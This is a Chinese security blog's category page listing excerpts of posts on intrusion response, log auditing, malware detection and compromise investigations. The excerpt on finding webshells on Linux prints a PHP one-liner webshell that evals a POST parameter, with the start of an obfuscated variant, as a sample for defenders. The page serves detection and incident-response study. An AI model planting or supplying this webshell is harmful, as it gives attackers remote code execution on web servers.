文章分类 -  服务器安全检测

上一页 1 2
黑客入侵应急分析手工排查
摘要:先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权;未经授权请勿转载。先知技术社区投稿邮箱:Aliyun_xianzhi@service.alibaba.com; Author: sm0nk@猎户攻防实验室 行文仓促,不足之处,还望大牛指正。 1 事件分类 常见的安全事件: 2 排查思路 阅读全文
posted @ 2017-09-05 20:09 linuxsec 阅读(150) 评论(0) 推荐(0)
记一次服务器沦陷后的分析
摘要:0x01 前言 在这个open的互联网时代, 风险几乎无处不在,无时不有。如果对安全不重视的话,就会被挨打。 接到一个哥们的江湖救急,说他的测试服务器被机房电话投诉流量过大,把出口带宽都跑完了,自己上去检查没发现异常进程,就是历史操作记录和登录记录不见.哥第一反应就是,被人入侵了,攻击者太粗暴了,把 阅读全文
posted @ 2016-11-19 20:46 linuxsec 阅读(147) 评论(0) 推荐(0)
Linux入侵检测基础
摘要:一、审计命令 在linux中有5个用于审计的命令: last:这个命令可用于查看我们系统的成功登录、关机、重启等情况;这个命令就是将/var/log/wtmp文件格式化输出。lastb:这个命令用于查看登录失败的情况;这个命令就是将/var/log/btmp文件格式化输出。lastlog:这个命令用 阅读全文
posted @ 2016-11-19 20:34 linuxsec 阅读(214) 评论(0) 推荐(0)
没有外部工具,如何快速发现Windows中毒了
摘要:从事应急响应工作几年之后,我认为总结一份快速确定计算机是否被感染木马和病毒的“方法论”是十分有用的。这显然不是那么简单的,可我却发现感染几乎存在于所有不复杂的攻击中,如果你执行了以下检测,便可发现存在感染并快速杀掉它。所有这些事情都可以由一个建立于Windows命令行功能的管理员命令提示符完成。 1 阅读全文
posted @ 2016-11-19 20:18 linuxsec 阅读(112) 评论(0) 推荐(0)
有工具了,如何快速发现Windows中毒(含工具下载)
摘要:本文是之前《没有外部工具,如何快速发现Windows中毒了》的姊妹篇,探讨Windows电脑感染多种典型病毒后,在没有专业杀毒软件情况下的快速检测方法。 Process Explorer 这个工具就像ctrl + alt + delete,而最新版则可以支持提交运行程序散列到VirusTotal用于 阅读全文
posted @ 2016-11-19 20:16 linuxsec 阅读(498) 评论(0) 推荐(0)
病毒是如何将文件藏进注册表的
摘要:本文将介绍一种将可执行文件隐藏在Windows注册表的方法,包括将可执行文件部分或全部藏入注册表,之后再加载执行。攻击者往往未避免在二进制文件中出现恶意代码,把执行恶意功能的代码放在注册表的多个键值中,使得杀毒软件难以检测。这也是常见的恶意软件所采用的方法。 把文件放进注册表 第一节是关于将文件放入 阅读全文
posted @ 2016-11-19 20:13 linuxsec 阅读(301) 评论(0) 推荐(0)
一次对个人服务器入侵事件的调查
摘要:这一切还要从我收到的通知邮件:“Your server is sending spam”说起。首先要说的是,这台服务器是用来运行之前项目的静态网站,并不保存关键信息。由于不经常使用,即使有Joomla和WordPress这样的高危程序,我都懒得忘记定期更新了。这可能就是导致被入侵的原因。 1 通知邮 阅读全文
posted @ 2016-11-19 10:32 linuxsec 阅读(155) 评论(0) 推荐(0)
攻击检测和防范方法之日志分析
该文被密码保护。
posted @ 2016-11-19 10:30 linuxsec 阅读(0) 评论(0) 推荐(0)
Linux入侵取证:从一次应急事件讲起
该文被密码保护。
posted @ 2016-11-19 10:25 linuxsec 阅读(1) 评论(0) 推荐(0)
国家某局linux主机应急支援记录
摘要:Part0,概述 通过对进程、登录日志和历史命令分析,确认溯源一起入侵事件,对入侵者的恶意进程成功查杀,发现入侵者的ftp服务器,上面好多提权工具,朋友们拿去分(wan)析(shua)吧! Part1,事件应急 10月21日,国家某局的网络出现拥塞现象,10月23日上午10点到客户现场排查问题,通过 阅读全文
posted @ 2016-11-19 10:18 linuxsec 阅读(164) 评论(0) 推荐(0)
恶意代码清除实战
摘要:什么是恶意代码,指令集?是二进制可执行指令?还是脚本语言?字处理宏语言?其他指令集等等……以常见的类型举例,那么如果一台服务器存在恶意代码,windows系列机器的恶意代码一般指的是病毒,蠕虫,木马后门,linux系统机器恶意代码一般就是Rootkit。 那么如何快速判断自己的web服务器是否存在恶 阅读全文
posted @ 2016-11-19 10:16 linuxsec 阅读(440) 评论(0) 推荐(0)
Linux服务器应急事件溯源报告
摘要:0x00 目录 关于目标环境的中间进度检测报告 一:情况概述 二:取证情况 2.1 目标网络情况 2.2 针对xxx服务器中间件的检测 2.3 针对xxx服务器进程及端口的检测 2.4 发现攻击者的攻击操作 三:溯源操作 3.1 关于攻击者的反向检测 四:攻击源确定 4.1 确定攻击入口处 五:安全 阅读全文
posted @ 2016-11-18 20:59 linuxsec 阅读(1791) 评论(0) 推荐(1)
主机被入侵分析过程报告
摘要:来自:wooyun 0x00 结论 14号上午接到同事报告,某主机cpu占用至100%并出现可疑进程,安全部接手调查后结论如下: 0x01 过程 分析过程如下: 登入主机后,找到可疑进程PID 进入proc/进程目录找到对应文件绝对路径在/usr/bin目录下,stat信息如下: 1 2 3 4 5 阅读全文
posted @ 2016-11-18 20:57 linuxsec 阅读(426) 评论(0) 推荐(0)
“抗马”小兵的一次实战记录
摘要:来自:freebuf 对于安全工作者来说,木马既是我们的敌人,也是我们的“朋友”。甚至可以这样说,木马使我们进步,安逸使我们落后。这不,这位抗马新兵就不甘落后,分享了他的抗马记录。 刚工作不久就遭遇了3次木马攻击,第一是是root木马,控制服务器对阿里某云进行流量攻击,后两次是minerd木马攻击, 阅读全文
posted @ 2016-11-18 20:54 linuxsec 阅读(114) 评论(0) 推荐(0)
linux查找webshell
摘要:首先认识一下小马,一般大马容易暴露,骇客都会留一手,把小马加入正常PHP文件里面 <?php eval ($_POST[a]);?> //密码为a,使用中国菜刀连接 隐藏很深的小马 fputs(fopen(chr(46).chr(47).chr(97)……省略 解码: 其中chr括号里面的数字是美国 阅读全文
posted @ 2016-11-18 20:49 linuxsec 阅读(299) 评论(0) 推荐(0)
一些关于Linux入侵应急响应的碎碎念
摘要:转载 hyber 近半年做了很多应急响应项目,针对黑客入侵。但疲于没有时间来总结一些常用的东西,寄希望用这篇博文分享一些安全工程师在处理应急响应时常见的套路,因为方面众多可能有些杂碎。 个人认为入侵响应的核心无外乎四个字,顺藤摸瓜。我们常常需要找到比较关键的信息后通过一些指令查询或者分析日志,逐步分 阅读全文
posted @ 2016-11-18 20:38 linuxsec 阅读(103) 评论(0) 推荐(0)

上一页 1 2